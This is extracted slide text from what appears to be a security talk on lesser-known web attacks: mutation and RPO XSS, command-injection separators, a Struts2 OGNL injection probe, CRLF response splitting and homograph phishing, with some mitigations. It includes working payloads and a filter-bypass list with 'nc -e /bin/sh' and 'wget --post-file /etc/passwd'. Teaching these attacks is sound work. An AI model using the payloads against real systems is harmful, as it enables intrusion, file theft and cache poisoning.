4. It’s all about PoPuP
LesserKnownWebAppAttacks
Cross site Scripting-
Mutation XSS
5. LesserKnownWebAppAttacks
HTML encoded payload
<listing><img src=1 onerror=alert(1)></listing>
we will put this piece of code into another code using innerHTML
property.
<listing id=x><img src=1 onerror=alert(1)></listing>
<script>alert(document.getElementById('x').innerHTML)</script>
When this code will execute, browser will read innerHTML and call
document.getElementById(‘x’)
Resulting in multiple level of decoding and mutate from safe to
unsafe state.
8. LesserKnownWebAppAttacks
Mitigation:
Server-side mitigation
• Avoiding outputting server content otherwise
incorrectly converted by the browser.
• The flawed content should be replaced with
semantically equivalent content which is converted
properly by the browser.
Client-side mitigation
• Browsers should implement ECMA Script 5 and higher.
• TrueHTML: TrueHTML relies on the XMLSerializer DOM
object provided by all of the user agents.
• https://cure53.de/fp170.pdf
9. LesserKnownWebAppAttacks
Cross site Scripting-
RPO XSS
Relative path Overwrite xss
• Difference between Absolute and Relative url
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory
To exploit this findings three things are necessary,
1) stored XSS that allows CSS injection.
2) URL Rewriting.
3) Relative addressing to CSS style sheet.
10. LesserKnownWebAppAttacks
D
E
M
O
• Step 1: Lets visit
www.webdevelopersnotes.com/graphics/index.php3
• To check URL re-writing add ‘/’
• Open re-writed url with xss payloadin IE
and see the Magic ;)
• http://challenge.hackvertor.co.uk/
xss_horror_show/chapter7/rpo.php/
Mitigation:
• It is recommended that absolute URLs should be used
throughout a site.
• Otherwise relative root url should be used.
15. LesserKnownWebAppAttacks
Now what if ( ; ) is blocked by the application?
X ;Y = Seperating Commands (Run X and
then Y, regardless of success of X)
X |Y = PIPE (Run X and pass output of X toY)
X ^Y = PIPEZ
X &&Y =AND (RunYif X succeeded )
FAIL||Y = OR (RunYif X failed)
X %0D Y%0D Z = OR
` X ` = Backtick
` X &Y` = Background (RunYand then run X in
background, regardless of success of X)
$( command )
nc -e /bin/sh = Netcat
wget --post-file /etc/passwd = WGET
16. LesserKnownWebAppAttacks
RCE never dies!!!
• "action:", "redirect:" or "redirectAction:" is not
properly sanitized.
• information will be evaluated as OGNL (Object-Graph
Navigation Language) expression against the value stack,
this introduces the possibility to inject server side code.
Apache struts2 RCE
http://host/struts2-
blank/example/X.action?action:${3*4}
18. LesserKnownWebAppAttacks
Divide and Conquer cR-LFAttack
• CR stands for Carriage Return (CR,ASCII 13, r)
• LF stands for Line feed (LF, ASCII 10, n)
How this Attack work?
The server script embeds user data in HTTP response headers.
Example: Step1: There is redirection page “redir_lang.jsp”
When we hit index page server responds with following response
<%
response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang"));
%>
20. LesserKnownWebAppAttacks
Lets Attack ;)
Step 3: Instead of passing value as English. Lets pass our attack
vector as shown.
/redir_lang.jsp?lang=foobar%0d%0aContentLength
:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCont
entType:%20text/html%0d%0aContentLength:%2019%
0d%0a%0d%0a<html>Shazam</html>
Note: We have URLencoded the CRLF sequences
Lets see what server responds with
21. LesserKnownWebAppAttacks
A first HTTP
response, which
is a 302
(redirection)
response.
A second HTTP
response, which is a
200 response, with a
content comprising
of 19 bytes of HTML.
Superfluous data
22. So when the attacker feeds the target with two requests, the first
being to the URL
/redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%
0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aCont
entLength:%2019%0d%0a%0d%0a<html>Shazam</html>
And the second to the URL > /index.html
The target would believe that the first request is matched to the
first response:
And the second request (to /index.html) is matched to the second
response:
LesserKnownWebAppAttacks
23. What Attacker can do by
CRLF attack?
Cross site scripting >>
http://blog.innerht.ml/twitter-crlf-injection
Web Cache Poisoning (defacement)
Cross User attacks (single user, single page, temporary
defacement)
Hijacking pages with user-specific information
Browser cache poisoning
LesserKnownWebAppAttacks
27. LesserKnownWebAppAttacks
What Attacker can do by
Homograph attack?
Phishing
Un-validated Redirection
Fake websites
Attacker may combine this with SSLattacks
http://www.blackhat.com/presentations/bh-dc-
09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf